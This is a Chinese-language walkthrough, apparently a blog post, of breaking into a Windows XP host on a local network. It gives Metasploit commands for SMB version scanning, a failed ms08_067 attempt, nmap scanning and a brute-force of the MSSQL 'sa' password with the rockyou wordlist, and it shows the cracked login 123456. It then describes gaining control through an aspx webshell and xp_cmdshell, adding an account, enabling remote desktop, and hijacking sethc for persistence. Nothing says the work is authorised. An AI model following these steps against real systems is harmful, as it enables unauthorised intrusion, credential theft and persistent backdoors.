0X01 准备
vmware,Kali linux,啊D网络工具包
0x02 初探
我上网的这台电脑IP是192.168.21.128
先使用kali linux虚拟机对整个网络进行扫描!
然发现192.168.1.1 开放了23 telnet 端口!(为什么只扫到了1.x网段呢?)详解移步
之前是打算用armitage,但是不知道为什么一直连接不上!
用啊D直接对整个网络进行扫描 192.168.1.0-192.168.255.255
过了漫长的时间,扫出192.168.3.99 开放了445 端口
打开kali 用msf进行一下深入扫描(smb_version 协议扫描)
首先启动msf
msfconsole
search smb_version
use auxiliary/scanner/smb/smb_version
show options
set RHOST 192.168.3.99
run
之后我们会发现系统版本和补丁信息
windows XP sp3
然后再利用ms08_067对目标进行一次攻击
然而我们想的太简单了,攻击失败,没有返回目标的shell
对目标进行一次隐秘的端口扫描
db_nmap -sS -Pn 192.168.3.99
发现1433端口开放
使用msf下的mssql_login破解sa的密码
search mssql_login
use 破解脚本
set PASS_FILE /usr/share/wordlists/rockyou.txt
set RHOST 192.168.3.99
exploit
图上看到的
[+] 192.168.3.99:1433 - LOGIN SUCCESSFUL: WORKSTATIONsa:123456
密码出来了, 123456
我们再加载一个 payload
如下图
msf 并没有为攻击者返回 meterpreter 会话
那么我们就手工来获取对方权限
首先下载一个 aspx 本地环境
弄一个 aspx 大马
输入 mssql 目标和账户密码进行链接
创建 cmdshell
执行系统命令
添加账户,开启 3389 之后,考虑到对方是 xp 便没有登录
可以考虑劫持 sethc 或者其他后门程序!
以上操作请往下看图
